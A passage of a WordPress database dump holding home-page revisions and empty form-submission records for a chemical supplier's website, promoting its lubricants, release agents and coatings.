id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-12-28 19:21:33', '2016-12-28 19:21:33', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3368, 0, '2016-12-28 19:23:30', '2016-12-28 19:23:30', '', '', '', 'publish', 'closed', 'closed', '', '3368', '', '', '2016-12-28 19:23:30', '2016-12-28 19:23:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3368/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3369, 3, '2016-12-28 19:30:36', '2016-12-28 19:30:36', '', 'ms-550n', '', 'inherit', 'closed', 'closed', '', 'ms-550n-2', '', '', '2016-12-28 19:30:36', '2016-12-28 19:30:36', '', 3358, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/MS-550N.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3370, 0, '2016-12-28 20:34:54', '2016-12-28 20:34:54', '', '', '', 'publish', 'closed', 'closed', '', '3370', '', '', '2016-12-28 20:34:55', '2016-12-28 20:34:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3370/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3371, 2, '2016-12-28 20:40:32', '2016-12-28 20:40:32', '', '', '', 'publish', 'closed', 'closed', '', '3371', '', '', '2016-12-28 20:40:32', '2016-12-28 20:40:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3371/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3372, 2, '2016-12-28 20:40:49', '2016-12-28 20:40:49', '', '', '', 'publish', 'closed', 'closed', '', '3372', '', '', '2016-12-28 20:40:49', '2016-12-28 20:40:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/3372/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3373, 0, '2016-12-29 04:42:20', '2016-12-29 04:42:20', '', '', '', 'publish', 'closed', 'closed', '', '3373', '', '', '2016-12-29 04:42:21', '2016-12-29 04:42:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3373/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3374, 0, '2016-12-29 13:31:33', '2016-12-29 13:31:33', '', '', '', 'publish', 'closed', 'closed', '', '3374', '', '', '2016-12-29 13:31:34', '2016-12-29 13:31:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3374/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3375, 0, '2016-12-30 05:34:45', '2016-12-30 05:34:45', '', '', '', 'publish', 'closed', 'closed', '', '3375', '', '', '2016-12-30 05:34:45', '2016-12-30 05:34:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/3375/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3377, 300, '2016-12-30 22:21:54', '2016-12-30 22:21:54', '', '', '', 'publish', 'closed', 'closed', '', '3377', '', '', '2016-12-30 22:21:55', '2016-12-30 22:21:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3377/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3378, 0, '2017-01-02 15:54:32', '2017-01-02 15:54:32', '', '', '', 'publish', 'closed', 'closed', '', '3378', '', '', '2017-01-02 15:54:32', '2017-01-02 15:54:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3378/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3379, 0, '2017-01-02 18:29:29', '2017-01-02 18:29:29', '', '', '', 'publish', 'closed', 'closed', '', '3379', '', '', '2017-01-02 18:29:29', '2017-01-02 18:29:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3379/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3380, 0, '2017-01-02 19:31:45', '2017-01-02 19:31:45', '', '', '', 'publish', 'closed', 'closed', '', '3380', '', '', '2017-01-02 19:31:46', '2017-01-02 19:31:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3380/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3382, 2, '2017-01-03 14:11:29', '2017-01-03 14:11:29', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-01-03 14:11:29', '2017-01-03 14:11:29', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3383, 0, '2017-01-03 14:53:59', '2017-01-03 14:53:59', '', '', '', 'publish', 'closed', 'closed', '', '3383', '', '', '2017-01-03 14:53:59', '2017-01-03 14:53:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3383/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3384, 0, '2017-01-03 15:33:32', '2017-01-03 15:33:32', '', '', '', 'publish', 'closed', 'closed', '', '3384', '', '', '2017-01-03 15:33:33', '2017-01-03 15:33:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3384/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3385, 0, '2017-01-03 16:49:26', '2017-01-03 16:49:26', '', '', '', 'publish', 'closed', 'closed', '', '3385', '', '', '2017-01-03 16:49:26', '2017-01-03 16:49:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3385/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3386, 0, '2017-01-03 18:39:52', '2017-01-03 18:39:52', '', '', '', 'publish', 'closed', 'closed', '', '3386', '', '', '2017-01-03 18:39:53', '2017-01-03 18:39:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/3386/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3387, 0, '2017-01-04 05:34:14', '2017-01-04 05:34:14', '', '', '', 'publish', 'closed', 'closed', '', '3387', '', '', '2017-01-04 05:34:14', '2017-01-04 05:34:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/3387/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3388, 0, '2017-01-04 12:29:04', '2017-01-04 12:29:04', '', '', '', 'publish', 'closed', 'closed', '', '3388', '', '', '2017-01-04 12:29:04', '2017-01-04 12:29:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/3388/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3389, 0, '2017-01-04 14:54:06', '2017-01-04 14:54:06', '', '', '', 'publish', 'closed', 'closed', '', '3389', '', '', '2017-01-04 14:54:07', '2017-01-04 14:54:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3389/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3392, 0, '2017-01-04 18:38:30', '2017-01-04 18:38:30', '', '', '', 'publish', 'closed', 'closed', '', '3392', '', '', '2017-01-04 18:38:30', '2017-01-04 18:38:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3392/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3393, 0, '2017-01-04 19:14:40', '2017-01-04 19:14:40', '', '', '', 'publish', 'closed', 'closed', '', '3393', '', '', '2017-01-04 19:14:41', '2017-01-04 19:14:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/3393/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3394, 0, '2017-01-04 23:00:53', '2017-01-04 23:00:53', '', '', '', 'publish', 'closed', 'closed', '', '3394', '', '', '2017-01-04 23:00:54', '2017-01-04 23:00:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3394/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3395, 0, '2017-01-04 23:54:48', '2017-01-04 23:54:48', '', '', '', 'publish', 'closed', 'closed', '', '3395', '', '', '2017-01-04 23:54:48', '2017-01-04 23:54:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3395/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3396, 0, '2017-01-05 02:06:49', '2017-01-05 02:06:49', '', '', '', 'publish', 'closed', 'closed', '', '3396', '', '', '2017-01-05 02:06:50', '2017-01-05 02:06:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3396/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3397, 0, '2017-01-05 08:53:33', '2017-01-05 08:53:33', '', '', '', 'publish', 'closed', 'closed', '', '3397', '', '', '2017-01-05 08:53:34', '2017-01-05 08:53:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3397/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3398, 0, '2017-01-05 11:32:08', '2017-01-05 11:32:08', '', '', '', 'publish', 'closed', 'closed', '', '3398', '', '', '2017-01-05 11:32:08', '2017-01-05 11:32:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3398/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3399, 0, '2017-01-05 17:19:43', '2017-01-05 17:19:43', '', '', '', 'publish', 'closed', 'closed', '', '3399', '', '', '2017-01-05 17:19:43', '2017-01-05 17:19:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3399/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3400, 0, '2017-01-05 18:39:49', '2017-01-05 18:39:49', '', '', '', 'publish', 'closed', 'closed', '', '3400', '', '', '2017-01-05 18:39:49', '2017-01-05 18:39:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/3400/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3401, 0, '2017-01-06 01:42:15', '2017-01-06 01:42:15', '', '', '', 'publish', 'closed', 'closed', '', '3401', '', '', '2017-01-06 01:42:15', '2017-01-06 01:42:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/3401/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3402, 1, '2017-01-06 04:05:26', '2017-01-06 04:05:26', '<meta name="google-site-verification" content="jm5L09lM8uFLQ9zF326l598hLano6cavx-NzjAnAXzA" />\r\n[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-01-06 04:05:26', '2017-01-06 04:05:26', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3403, 1, '2017-01-06 04:06:21', '2017-01-06 04:06:21', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-01-06 04:06:21', '2017-01-06 04:06:21', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3404, 0, '2017-01-06 08:34:15', '2017-01-06 08:34:15', '', '', '', 'publish', 'closed', 'closed', '', '3404', '', '', '2017-01-06 08:34:16', '2017-01-06 08:34:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3404/', 0, 'nf_sub', '', 0); 
